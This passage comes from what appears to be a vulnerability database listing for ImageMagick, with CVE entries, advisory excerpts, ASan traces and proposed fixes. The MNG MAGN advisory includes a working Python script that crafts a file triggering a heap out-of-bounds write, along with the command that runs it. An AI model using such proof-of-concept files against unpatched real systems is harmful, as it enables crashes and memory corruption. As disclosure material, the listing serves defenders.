00 00 00 00 00 00 00 00 00 0x100035061920: 00 00 00 00 00 00 00 00 f3 f3 f3 f3 f3 f3 f3 f3 0x100035061930: f3 f3 f3 f3 f3 f3 f3 f3 00 00 00 00 00 00 00 00 0x100035061940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x100035061950: f1 f1 00 f2 f2[f2]00 00 00 00 00 00 00 00 00 00 0x100035061960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100035061970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100035061980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100035061990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x1000350619a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==4155==ABORTING ``` ### Affected Code In `MagickCore/image.c`, within the `InterpretImageFilename()` function: ```c MagickExport size_t InterpretImageFilename(const ImageInfo *image_info, Image *image,const char *format,int value,char *filename, ExceptionInfo *exception) { ... for (p=strchr(format,'%'); p != (char *) NULL; p=strchr(p+1,'%')) { q=(char *) p+1; if (*q == '%') { p=q+1; continue; } field_width=0; if (*q == '0') field_width=(ssize_t) strtol(q,&q,10); switch (*q) { case 'd': case 'o': case 'x': { q++; c=(*q); *q='\0'; /*--------Affected--------*/ (void) FormatLocaleString(filename+(p-format-offset),(size_t) (MagickPathExtent-(p-format-offset)),p,value); offset+=(4-field_width); /*--------Affected--------*/ *q=c; (void) ConcatenateMagickString(filename,q,MagickPathExtent); canonical=MagickTrue; if (*(q-1) != '%') break; p++; break; } case '[': { ... } default: break; } } ``` ## Technical Analysis This vulnerability is caused by an inconsistency in the template expansion processing within `InterpretImageFilename()`. The format specifiers `%d`, `%o`, and `%x` in templates are replaced with integer values by `FormatLocaleString()`, but the output buffer position is calculated by `filename + (p - format - offset)`. The `offset` variable is cumulatively incremented to correct the output length of `%d` etc., but the design using a static `offset += (4 - field_width)` causes `offset` to increase excessively when `%` specifiers are consecutive in the template, creating a dangerous state where the write destination address points before `filename`. The constant `4` was likely chosen based on the character count of typical format specifiers like `%03d` (total of 4 characters: `%`, `0`, `3`, `d`). However, in reality, there are formats with only 2 characters like `%d`, and formats with longer width specifications (e.g., `%010d`), so this uniform constant-based correction is inconsistent with actual template structures. As a result, when the correction value becomes excessive, `offset` exceeds the relative position `p - format` within the template, generating a negative index. This static and template-independent design of the correction processing is the root cause of this vulnerability. This causes `vsnprintf()` to write outside the stack buffer range, which is detected by AddressSanitizer as a `stack-buffer-overflow`. ## Proposed Fix In `MagickCore/image.c`, within the `InterpretImageFilename()` function: ```c MagickExport size_t InterpretImageFilename(const ImageInfo *image_info, Image *image,const char *format,int value,char *filename, ExceptionInfo *exception) { ... /*--------Changed--------*/ ssize_t field_width, offset, written; // Added /*--------Changed--------*/ ... for (p=strchr(format,'%'); p != (char *) NULL; p=strchr(p+1,'%')) { q=(char *) p+1; if (*q == '%') { p=q+1; continue; } field_width=0; if (*q == '0') field_width=(ssize_t) strtol(q,&q,10); switch (*q) { case 'd': case 'o': case 'x': { q++; c=(*q); *q='\0'; written = FormatLocaleString(filename+(p-format-offset),(size_t) (MagickPathExtent-(p-format-offset)),p,value); /*--------Changed--------*/ if (written <= 0 || written > (MagickPathExtent - (p - format - offset))) return 0; offset += (ssize_t)((q - p) - written); /*--------Changed--------*/ *q=c; (void) ConcatenateMagickString(filename,q,MagickPathExtent); canonical=MagickTrue; if (*(q-1) != '%') break; p++; break; } case '[': { ... } default: break; } } ``` - By updating `offset` based on the difference between template description length `(q - p)` and the number of output bytes `written`, buffer position consistency is maintained. - Correction is performed according to the actual template structure, ensuring stable behavior regardless of format length without relying on static constants. - Range checking of `written` allows detection of vsnprintf failures and excessive writes. ### Commits Fixed in https://github.com/ImageMagick/ImageMagick/commit/66dc8f51c11b0ae1f1cdeacd381c3e9a4de69774 and https://github.com/ImageMagick/ImageMagick6/commit/643deeb60803488373cd4799b24d5786af90972e CVE-2025-53101
GHSA-qh3h-j545-h8c9
VCID-9h1k-h8gw-hkat ImageMagick: Division by zero in WriteAnimatedWEBPImage() in coders/webp.c CVE-2021-20245
VCID-9n1x-qw25-mbhf ImageMagick: Infinite loop in the ReadWPGImage function CVE-2017-14341
VCID-9pr7-aw96-cqfb ImageMagick: Infinite loop in coders/png.c:ReadOneMNGImage() allows attackers to cause a denial of service via crafted MNG file CVE-2018-10177
VCID-9wbc-9sby-nfbq ImageMagick: memory leak vulnerability in ReadXWDImage function in coders/xwd.c CVE-2017-11166
VCID-9xbc-3nhd-cygp ImageMagick: memory leak in the function ReadPSDChannelZip in coders/psd.c CVE-2017-17886
VCID-9z34-j85g-9kej Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-13142
VCID-a1z8-rynx-p7a8 ImageMagick: Crash due to out of bounds error in SpliceImage CVE-2015-8897
VCID-a472-7128-s3eh Multiple vulnerabilities have been found in ImageMagick, the worst of which allows remote attackers to execute arbitrary code. CVE-2017-5509
VCID-a4jk-v4s2-r7dy ImageMagick: crash on corrupted dpc image CVE-2014-9808
VCID-aars-axy1-4yd6 security update CVE-2016-4562
VCID-acgu-hc83-yubn ImageMagick: memory leak in coders/dot.c CVE-2019-16713
VCID-acsa-1uwk-fqee ImageMagick has Possible Heap Information Disclosure in PSD ZIP Decompression ### Description A heap information disclosure vulnerability exists in ImageMagick's PSD (Adobe Photoshop) format handler. When processing a maliciously crafted PSD file containing ZIP-compressed layer data that decompresses to less than the expected size, uninitialized heap memory is leaked into the output image. ### Expected Impact Information disclosure leading to potential exposure of sensitive data from server memory. CVE-2026-24481
GHSA-96pc-27rx-pr36
VCID-aej5-sgf8-7uhp ImageMagick: heap-based buffer over-read at MagickCore/threshold.c in AdaptiveThresholdImage because a height of zero is mishandled CVE-2019-13297
VCID-agz5-g8mr-e7hn Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution. CVE-2022-32546
VCID-ajsf-6r6w-juey ImageMagick: heap overflow in quantum file CVE-2014-9822
VCID-ak8s-9hyp-47fa A format string vulnerability exists in ImageMagick that may allow an attacker to execute arbitrary code. CVE-2005-0397
VCID-anh4-1hmn-yfh8 ImageMagick: memory leak in identify -help CVE-2022-48541
VCID-ap1a-jz5x-ybfv ImageMagick: NULL pointer dereference in xcf.c CVE-2017-6501
VCID-aqs4-r36j-ffe7 Multiple vulnerabilities have been discovered in ImageMagick, the worst of which can lead to remote code execution. CVE-2022-44267
VCID-ay8n-59tt-k7cp ImageMagick: division by zero at MagickCore/resize.c CVE-2020-27763
VCID-aycq-4vqg-ubgp ImageMagick: Memory leak in ReadXPMImage function in coders/xpm.c CVE-2017-17680
VCID-azvc-qdxb-7bbu ImageMagick: Memory leak in the ReadSUNImage function CVE-2017-8356
VCID-b32k-mwuv-hfeq imagemagick: memory leak in function DecodeImage in coders/pcd.c CVE-2019-7175
VCID-b38j-8u7n-47ga ImageMagick: Heap buffer over-read in the GetPixelIndex() function CVE-2017-11540
VCID-b3ps-gf9j-vubp security update CVE-2016-8862
VCID-b43n-3d1g-u3fe ImageMagick's failure to limit MVG mutual causes Stack Overflow Magick fails to check for circular references between two MVGs, leading to a stack overflow. CVE-2025-68950
GHSA-7rvh-xqp3-pr8j
VCID-b5pd-kk97-gban ImageMagick: Converting multi-layer nested MVG to SVG can cause DoS Magick fails to check for multi-layer nested mvg conversions to svg, leading to DoS. CVE-2026-24484
GHSA-wg3g-gvx5-2pmv
VCID-b6c2-jyre-ykg9 security update CVE-2016-5690
VCID-b7dh-gjtk-qfhn ImageMagick: memory leak in coders/json.c:EncodeImageAttributes could cause crash CVE-2018-5358
VCID-b7u1-bftt-5kck ImageMagick: heap-based buffer over-read in MagickCore/composite.c in CompositeImage CVE-2019-13303
VCID-b8hx-6u4j-b3dc A vulnerability in ImageMagick's handling of PDF was discovered possibly allowing code execution. CVE-2020-29599
VCID-bcy4-phg3-w3fq ImageMagick: outside the range of representable values of type 'unsigned long' at MagickCore/statistic.c CVE-2020-27776
VCID-bd1g-sfsp-37h7 ImageMagick: Stack buffer overflow in FTXT reader via oversized integer field ### Summary A stack-based buffer overflow exists in the ImageMagick FTXT image reader. A crafted FTXT file can cause out-of-bounds writes on the stack, leading to a crash. ``` ================================================================= ==3537074==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffee4850ef0 at pc 0x5607c408fb33 bp 0x7ffee484fe50 sp 0x7ffee484fe40 WRITE of size 1 at 0x7ffee4850ef0 thread T0 ``` CVE-2026-25967
GHSA-72hf-fj62-w6j4
VCID-bf7n-dsx6-rqa2 Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-14224
VCID-bge6-p7sc-dqdu ImageMagick: Use-after-free in the TIFFSetProfiles function CVE-2017-14528
VCID-bgej-fguz-9fcv ImageMagick: heap overflow in wpf file CVE-2014-9835
VCID-bhkh-rppj-1bb5 ImageMagick: Memory leak in function ReadXPMImage in coders/xpm.c CVE-2017-17882
VCID-bjr3-shza-a7hc security flaw CVE-2005-0762
VCID-bky2-hjpj-67ag ImageMagick: heap-use-after-free in RelinquishDCMInfo of dcm.c CVE-2022-1114
VCID-bmhu-4vgv-y7gy security update CVE-2016-10054
VCID-bpqt-4zxx-fkd4 security update CVE-2016-6823
VCID-bs5z-jh2d-nfgv security flaw CVE-2004-0827
VCID-bum5-f5xb-akeg ImageMagick: use-after-free in MngInfoDiscardObject in coders/png.c CVE-2019-19952
VCID-bw4q-dt1r-y3e4 ImageMagick has heap-based buffer overflow in UHDR encoder A heap-based buffer overflow in the UHDR encoder can happen due to truncation of a value and it would allow an out of bounds write. ``` ================================================================ ==2158399==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x521000039500 at pc 0x562a4a42f968 bp 0x7ffcca4ed6c0 sp 0x7ffcca4ed6b0 WRITE of size 1 at 0x521000039500 thread T0 ``` CVE-2026-30931
GHSA-h95r-c8c7-mrwx
VCID-bz5u-dqy6-4ucd ImageMagick: Memory leak in the ReadICONImage function CVE-2017-9405
VCID-c11x-uq25-17b1 ImageMagick: Memory exhaustion in the ReadSUNImage function CVE-2017-14531
VCID-c3ut-nv6u-efbj security update CVE-2016-7514
VCID-c8rr-y6zy-h7h5 ImageMagick: integer overflow at MagickCore/statistic.c CVE-2020-27774
VCID-c9cz-ebdv-t7eq Multiple vulnerabilities have been found in ImageMagick, the worst of which allows remote attackers to execute arbitrary code. CVE-2016-3718
VCID-cbqr-aybx-d3e6 ImageMagick has Use After Free in MSLStartElement in "coders/msl.c" A crafted MSL script triggers a heap-use-after-free. The operation element handler replaces and frees the image while the parser continues reading from it, leading to a UAF in ReadBlobString during further parsing. CVE-2026-25983
GHSA-fwqw-2x5x-w566
VCID-ccbh-689z-6kg2 ImageMagick: heap-based buffer over-read in WritePNGImage in coders/png.c CVE-2019-19949
VCID-cdsg-3312-zka6 security update CVE-2016-9556
VCID-chgt-azpf-auba security update CVE-2018-16642
VCID-cjf4-c7t6-hqat ImageMagick: Memory leak in the REadARTImage function CVE-2017-9143
VCID-ckma-a7b3-k3aw Multiple vulnerabilities have been found in ImageMagick, the worst of which allows remote attackers to execute arbitrary code. CVE-2016-7906
VCID-cmym-m1da-f3fg ImageMagick: Division by zero in ImplodeImage in MagickCore/visual-effects.c CVE-2021-20244
VCID-cqpp-1e1t-x7aa ImageMagick: fd leak due to corrupted file CVE-2014-9806
VCID-crpp-9mt6-nbb6 ImageMagick: memory leak in the function ReadPICTImage in coders/pict.c CVE-2017-17885
VCID-cuhw-ew1g-s3h2 ImageMagick has Heap Use-After-Free in ImageMagick MSL decoder A heap use-after-free vulnerability in ImageMagick's MSL decoder allows an attacker to trigger access to freed memory by crafting an MSL file. ``` ================================================================= ==1500633==ERROR: AddressSanitizer: heap-use-after-free on address 0x527000011550 at pc 0x5612583fa212 bp 0x7ffedb86d160 sp 0x7ffedb86d150 READ of size 8 at 0x527000011550 thread T0 ``` CVE-2026-28687
GHSA-fpvf-frm6-625q
VCID-cure-qgzj-8qfu ImageMagick: outside the range of representable values of type 'long' and integer overflow at MagickCore/transform.c and MagickCore/image.c CVE-2020-25675
VCID-cuyh-2uau-1yad security update CVE-2017-11478
VCID-cvqm-2557-e7ba ImageMagick: heap overflow in pcx file CVE-2014-9832
VCID-cwez-6cgj-17gz Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-12140
VCID-cz1h-x2a4-zkhj ImageMagick: memory leak in the function ReadMATImage in coders/mat.c CVE-2017-18029
VCID-cznc-ubr4-zkcu ImageMagick and GraphicsMagick utilities can be abused to perform a Denial of Service attack. CVE-2005-1739
VCID-d74a-pd2n-6khw security update CVE-2017-11529
VCID-d8yf-8rff-3yhf ImageMagick has a possible infinite loop in its JPEG encoder when using `jpeg:extent` A `continue` statement in the JPEG extent binary search loop in the jpeg encoder causes an infinite loop when writing persistently fails. An attacker can trigger a 100% CPU consumption and process hang (Denial of Service) with a crafted image. CVE-2026-26283
GHSA-gwr3-x37h-h84v
VCID-dabd-m3mf-3ker ImageMagick has Heap Buffer Over-Read in BilateralBlurImage BilateralBlurImage contains a heap buffer over-read caused by an incorrect conversion. When processing a crafted image with the `-bilateral-blur` operation an out of bounds read can occur. ``` ================================================================= ==676172==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x50a0000079c0 at pc 0x57b483c722f7 bp 0x7fffc0acd380 sp 0x7fffc0acd370 READ of size 4 at 0x50a0000079c0 thread T0 ``` CVE-2026-30935
GHSA-cqw9-w2m7-r2m2
VCID-dcde-mybb-bygv ImageMagick: Memory leak in the ReadSFWImage function CVE-2017-8349
VCID-dfzv-wzru-w3gx security flaw CVE-2003-0455
VCID-dge7-469z-u7gq ImageMagick: NULL pointer dereference in saveBinaryCLProgram in magick/opencl.c CVE-2017-18211
VCID-djqz-f6k5-fqfj ImageMagick: memory leaks with convert command CVE-2021-3574
VCID-dkf5-8kww-mkhn ImageMagick: Memory allocation failure in ReadTIFFImage function in memory.c CVE-2018-7443
VCID-dkzb-3u3f-yuee ImageMagick: Memory leak in WriteTIFFImage CVE-2018-10804
VCID-dmut-jm9s-8ucc ImageMagick: crash in png coder CVE-2014-9849
VCID-dqjz-99u6-uyh3 security update CVE-2016-7534
VCID-dr7r-hah7-vfdv security update CVE-2016-8677
VCID-dsee-yrq9-cuca Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-13062
VCID-dt8r-gjff-pqe4 Multiple packages suffer from RUNPATH issues that may allow users in the "portage" group to escalate privileges. CVE-2005-3582
VCID-dtza-65ku-aber ImageMagick has NULL pointer dereference in ReadSFWImage after DestroyImageInfo (sfw.c) In `ReadSFWImage()` (`coders/sfw.c`), when temporary file creation fails, `read_info` is destroyed before its `filename` member is accessed, causing a NULL pointer dereference and crash. ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==1414421==ERROR: AddressSanitizer: UNKNOWN SIGNAL on unknown address 0x000000000000 (pc 0x56260222912f bp 0x7ffec0a193b0 sp 0x7ffec0a19360 T0) #0 0x56260222912f (/data/ylwang/LargeScan/targets/ImageMagick/utilities/magick+0x235f12f) ``` CVE-2026-25795
GHSA-p33r-fqw2-rqmm
VCID-dvvt-ud6y-ffe8 security update CVE-2017-11141
VCID-dw5u-34qe-cuat ImageMagick: NULL pointer dereference in wpg file handling CVE-2014-9814
VCID-dzxx-5pbd-fqc4 ImageMagick: memory leak in the function GetImagePixelCache CVE-2017-17887
VCID-e3av-cqc9-dye1 ImageMagick: Memory leak in ReadDCMImage function in coders/dcm.c CVE-2017-12644
VCID-e3ne-1hd5-dyfg ImageMagick: Incorrect Handling of Image Depth in MIFF Processing in ImageMagick CVE-2025-43965
VCID-eb4u-x1mt-2uan ImageMagick: Division by zero in sRGBTransformImage() in MagickCore/colorspace.c CVE-2021-20311
VCID-eb86-ytt7-j3gf ImageMagick: infinite loop ReadTXTImage in function in coders/txt.c CVE-2017-18273
VCID-ebyn-hv86-8kdz Out of bound write in ImageMagick's XCF coder CVE-2008-1096
VCID-ee5d-s8eb-tbdn security update CVE-2017-12431
VCID-eeah-xwrp-f3b5 Multiple vulnerabilities have been found in ImageMagick, the worst of which may allow remote attackers to cause a Denial of Service condition. CVE-2017-13133
VCID-ef36-52cx-dfg5 imagemagick: integer overflows in MNG magnification ## **Vulnerability Details** The magnified size calculations in `ReadOneMNGIMage` (in `coders/png.c`) are unsafe and can overflow, leading to memory corruption. The source snippet below is heavily abbreviated due to the size of the function, but hopefully the important points are captured. ```c static Image *ReadOneMNGImage(MngReadInfo* mng_info, const ImageInfo *image_info,ExceptionInfo *exception) { // Lots of stuff, this is effectively a state machine for the MNG rendering commands, // skip to the point where we start processing the "MAGN" command. if (memcmp(type,mng_MAGN,4) == 0) { png_uint_16 magn_first, magn_last, magn_mb, magn_ml, magn_mr, magn_mt, magn_mx, magn_my, magn_methx, magn_methy; // Details unimportant, but each of the `magn_xxx` variables is read from the file. if (magn_first == 0 || magn_last == 0) { /* Save the magnification factors for object 0 */ mng_info->magn_mb=magn_mb; mng_info->magn_ml=magn_ml; mng_info->magn_mr=magn_mr; mng_info->magn_mt=magn_mt; mng_info->magn_mx=magn_mx; mng_info->magn_my=magn_my; mng_info->magn_methx=magn_methx; mng_info->magn_methy=magn_methy; } } // Details unimportant, we load the image to be scaled and store it in `image` if (mng_type) { MngBox crop_box; if (((mng_info->magn_methx > 0) && (mng_info->magn_methx <= 5)) && ((mng_info->magn_methy > 0) && (mng_info->magn_methy <= 5))) { png_uint_32 magnified_height, magnified_width; if (logging != MagickFalse) (void) LogMagickEvent(CoderEvent,GetMagickModule(), " Processing MNG MAGN chunk"); if (image->columns == 1) mng_info->magn_methx = 1; if (image->rows == 1) mng_info->magn_methy = 1; if (mng_info->magn_methx == 1) { magnified_width=mng_info->magn_ml; // [0] if (image->columns > 1) magnified_width += mng_info->magn_mr; // [1] if (image->columns > 2) magnified_width += (png_uint_32) ((image->columns-2)*(mng_info->magn_mx)); // [2] } // Different cases handle available scaling kinds, all of which have similar issues... // We now check whether the output image is larger than the input image in either // dimension, and if so, we will allocate a new image buffer of size // `magnified_width * magnified_height`. if (magnified_height > image->rows || magnified_width > image->columns) { Image *large_image; // Snip... large_image->columns=magnified_width; large_image->rows=magnified_height; magn_methx=mng_info->magn_methx; magn_methy=mng_info->magn_methy; // In between here, we allocate the pixel buffer for `large_image`. /* magnify the rows into the right side of the large image */ if (logging != MagickFalse) (void) LogMagickEvent(CoderEvent,GetMagickModule(), " Magnify the rows to %.20g", (double) large_image->rows); m=(ssize_t) mng_info->magn_mt; yy=0; length=(size_t) GetPixelChannels(image)*image->columns; next=(Quantum *) AcquireQuantumMemory(length,sizeof(*next)); prev=(Quantum *) AcquireQuantumMemory(length,sizeof(*prev)); if ((prev == (Quantum *) NULL) || (next == (Quantum *) NULL)) { if (prev != (Quantum *) NULL) prev=(Quantum *) RelinquishMagickMemory(prev); if (next != (Quantum *) NULL) next=(Quantum *) RelinquishMagickMemory(next); image=DestroyImageList(image); ThrowReaderException(ResourceLimitError, "MemoryAllocationFailed"); } n=GetAuthenticPixels(image,0,0,image->columns,1,exception); (void) memcpy(next,n,length); for (y=0; y < (ssize_t) image->rows; y++) { if (y == 0) m=(ssize_t) mng_info->magn_mt; else if (magn_methy > 1 && y == (ssize_t) image->rows-2) m=(ssize_t) mng_info->magn_mb; else if (magn_methy <= 1 && y == (ssize_t) image->rows-1) m=(ssize_t) mng_info->magn_mb; else if (magn_methy > 1 && y == (ssize_t) image->rows-1) m=1; else m=(ssize_t) mng_info->magn_my; n=prev; prev=next; next=n; if (y < (ssize_t) image->rows-1) { n=GetAuthenticPixels(image,0,y+1,image->columns,1, exception); (void) memcpy(next,n,length); } for (i=0; i < m; i++, yy++) { Quantum *pixels; assert(yy < (ssize_t) large_image->rows); pixels=prev; n=next; q=GetAuthenticPixels(large_image,0,yy,large_image->columns, 1,exception); if (q == (Quantum *) NULL) break; q+=(ptrdiff_t) (large_image->columns-image->columns)* GetPixelChannels(large_image); // [3] ``` If we look at the calculation for `magnified_width`, we can see that we are storing the results in a `png_uint32`. The operations at \[0\] and \[1\] are safe, since `mng_info->magn_ml` and `mng_info->magn_mx` are both 16-bit unsigned integers, but both the multiplication at \[2\] and the addition of the result of that multiplication to `magnified_width` can overflow, leading to a value of `magnified_width` that is smaller than required. When we then operate on the pixel buffers, we use the original parameters for the magnification, and we assume (reasonably?) that the output buffer is larger than the input buffer when calculating where to write the upsampled/magnified pixel values. Unfortunately, after the overflow has happened, this assumption is no longer true, and the calculation at \[3\] will end up with a `q` pointer outside the buffer bounds. This issue leads to an out-of-bounds write of controlled data beyond the bounds of a heap allocation. Triggering this issue requires an `image` with large `columns` or `rows` (\~65535) which should be prevented by all of the example security policies (which set `width`/`height` limits of `8KP`). ## **Affected Version(s)** Verified on current HEAD (305e383c8ac7b30bc2ee96ab8c43ec96217ec2a9) and latest stable release (7.1.2-0). ### **Build Instructions** ```shell git clone https://github.com/imagemagick/imagemagick cd imagemagick export CC=clang export CXX=clang++ export CFLAGS="-fsanitize=address" export CXXFLAGS="-fsanitize=address" export LDFLAGS="-fsanitize=address" ./configure --disable-shared --disable-docs --with-jxl make -j ``` ## **Reproduction** ### **Test Case** This testcase is a python script that will generate an MNG file with a MAGN chunk that triggers this overflow leading to an out-of-bounds heap write. ``` import struct import zlib def create_chunk(chunk_type, data): crc = zlib.crc32(chunk_type + data) & 0xFFFFFFFF return struct.pack('>I', len(data)) + chunk_type + data + struct.pack('>I', crc) # MNG signature mng_signature = b'\x8aMNG\r\n\x1a\n' # --- Dimensions --- mhdr_width = 1 mhdr_height = 1 ihdr_width = 65538 # W: Original width to cause W' overflow ihdr_height = 1 # H: Original height # MHDR chunk (Valid small dimensions) mhdr_data = struct.pack('>IIIIIII', mhdr_width, mhdr_height, 1, 0, 0, 0, 0) mhdr_chunk = create_chunk(b'MHDR', mhdr_data) # MAGN chunk: Trigger width overflow, force entry via height magn magn_first = 0 magn_last = 0 magn_methx = 1 magn_mx = 65535 # -> magnified_width = 65534 (overflow) magn_my = 2 # -> magnified_height = 2 (magn_mt=2) magn_ml = 65535 magn_mr = 65535 magn_mt = 2 # Force magnified_height > H (necessary to trigger large_image path) magn_mb = 1 magn_methy = 1 magn_data = struct.pack('>HHBHHHHHHB', magn_first, magn_last, magn_methx, magn_mx, magn_my, magn_ml, magn_mr, magn_mt, magn_mb, magn_methy) magn_chunk = create_chunk(b'MAGN', magn_data) # IHDR chunk ihdr_data = struct.pack('>IIBBBBB', ihdr_width, ihdr_height, 8, 0, 0, 0, 0) ihdr_chunk = create_chunk(b'IHDR', ihdr_data) # IDAT chunk (Minimal data for W x H grayscale pixels) scanline = b'\x00' + (b'\x00' * ihdr_width) compressed_scanline = zlib.compress(scanline) idat_chunk = create_chunk(b'IDAT', compressed_scanline) # IEND chunk iend_chunk = create_chunk(b'IEND', b'') # MEND chunk mend_chunk = create_chunk(b'MEND', b'') program_input = ( mng_signature + mhdr_chunk + magn_chunk + ihdr_chunk + idat_chunk + iend_chunk + mend_chunk ) print(f"Generated MNG size: {len(program_input)} bytes") with open("magn_write.mng", "wb") as tmp: tmp.write(program_input) ``` ### **Command** ```shell python3 ./generate_testcase.py utilities/magick ./magn_write.mng -resize 200x200 PNG:output.png ``` ### **ASan Backtrace** ``` ================================================================= ==585863==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f80849757d0 at pc 0x55744124fba3 bp 0x7fff1300ddf0 sp 0x7fff1300dde8 WRITE of size 4 at 0x7f80849757d0 thread T0 #0 0x55744124fba2 in SetPixelRed /tmp/repro/imagemagick/./MagickCore/pixel-accessor.h:913:52 #1 0x55744123be16 in ReadOneMNGImage /tmp/repro/imagemagick/coders/png.c:6657:27 #2 0x557441222c33 in ReadMNGImage /tmp/repro/imagemagick/coders/png.c:7341:9 #3 0x557441347da1 in ReadImage /tmp/repro/imagemagick/MagickCore/constitute.c:736:15 #4 0x55744134ad96 in ReadImages /tmp/repro/imagemagick/MagickCore/constitute.c:1078:9 #5 0x5574419135fc in CLINoImageOperator /tmp/repro/imagemagick/MagickWand/operation.c:4959:22 #6 0x55744190748c in CLIOption /tmp/repro/imagemagick/MagickWand/operation.c:5473:7 #7 0x5574417dd25b in ProcessCommandOptions /tmp/repro/imagemagick/MagickWand/magick-cli.c:653:13 #8 0x5574417de629 in MagickImageCommand /tmp/repro/imagemagick/MagickWand/magick-cli.c:1392:5 #9 0x5574417daf9c in MagickCommandGenesis /tmp/repro/imagemagick/MagickWand/magick-cli.c:177:14 #10 0x557440e237b9 in MagickMain /tmp/repro/imagemagick/utilities/magick.c:162:10 #11 0x557440e231e1 in main /tmp/repro/imagemagick/utilities/magick.c:193:10 #12 0x7f8087433ca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 #13 0x7f8087433d64 in __libc_start_main csu/../csu/libc-start.c:360:3 #14 0x557440d3f790 in _start (/tmp/repro/imagemagick/utilities/magick+0x1f2790) (BuildId: 926b2c12732f27a214dada191ea6277c7b553ea5) 0x7f80849757d0 is located 48 bytes before 1572816-byte region [0x7f8084975800,0x7f8084af57d0) allocated by thread T0 here: #0 0x557440de00cb in posix_memalign (/tmp/repro/imagemagick/utilities/magick+0x2930cb) (BuildId: 926b2c12732f27a214dada191ea6277c7b553ea5) #1 0x557440e58aa6 in AcquireAlignedMemory_POSIX /tmp/repro/imagemagick/MagickCore/memory.c:300:7 #2 0x557440e5885d in AcquireAlignedMemory /tmp/repro/imagemagick/MagickCore/memory.c:378:10 #3 0x5574412e9725 in OpenPixelCache /tmp/repro/imagemagick/MagickCore/cache.c:3775:46 #4 0x5574412eead7 in GetImagePixelCache /tmp/repro/imagemagick/MagickCore/cache.c:1782:18 #5 0x5574412ef71b in SyncImagePixelCache /tmp/repro/imagemagick/MagickCore/cache.c:5600:28 #6 0x557440e2e786 in SetImageStorageClass /tmp/repro/imagemagick/MagickCore/image.c:2617:10 #7 0x557440e2f075 in SetImageBackgroundColor /tmp/repro/imagemagick/MagickCore/image.c:2422:7 #8 0x55744123b3d6 in ReadOneMNGImage /tmp/repro/imagemagick/coders/png.c:6560:28 #9 0x557441222c33 in ReadMNGImage /tmp/repro/imagemagick/coders/png.c:7341:9 #10 0x557441347da1 in ReadImage /tmp/repro/imagemagick/MagickCore/constitute.c:736:15 #11 0x55744134ad96 in ReadImages /tmp/repro/imagemagick/MagickCore/constitute.c:1078:9 #12 0x5574419135fc in CLINoImageOperator /tmp/repro/imagemagick/MagickWand/operation.c:4959:22 #13 0x55744190748c in CLIOption /tmp/repro/imagemagick/MagickWand/operation.c:5473:7 #14 0x5574417dd25b in ProcessCommandOptions /tmp/repro/imagemagick/MagickWand/magick-cli.c:653:13 #15 0x5574417de629 in MagickImageCommand /tmp/repro/imagemagick/MagickWand/magick-cli.c:1392:5 #16 0x5574417daf9c in MagickCommandGenesis /tmp/repro/imagemagick/MagickWand/magick-cli.c:177:14 #17 0x557440e237b9 in MagickMain /tmp/repro/imagemagick/utilities/magick.c:162:10 #18 0x557440e231e1 in main /tmp/repro/imagemagick/utilities/magick.c:193:10 #19 0x7f8087433ca7 in __libc_start_call_main csu/../sysdeps/nptl/libc_start_call_main.h:58:16 SUMMARY: AddressSanitizer: heap-buffer-overflow /tmp/repro/imagemagick/./MagickCore/pixel-accessor.h:913:52 in SetPixelRed Shadow bytes around the buggy address: 0x7f8084975500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x7f8084975580: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x7f8084975600: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x7f8084975680: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x7f8084975700: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa =>0x7f8084975780: fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa fa fa 0x7f8084975800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x7f8084975880: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x7f8084975900: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x7f8084975980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x7f8084975a00: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==585863==ABORTING ``` ## **Reporter Credit** Google Big Sleep CVE-2025-55154
GHSA-qp29-wxp5-wh82
VCID-eg3d-khb6-rfh1 security update CVE-2016-10066
VCID-ehgb-g7qu-97an ImageMagick: Double free flaw in tga.c CVE-2015-8894
VCID-ekgu-5zg9-2uaa security update CVE-2017-11528
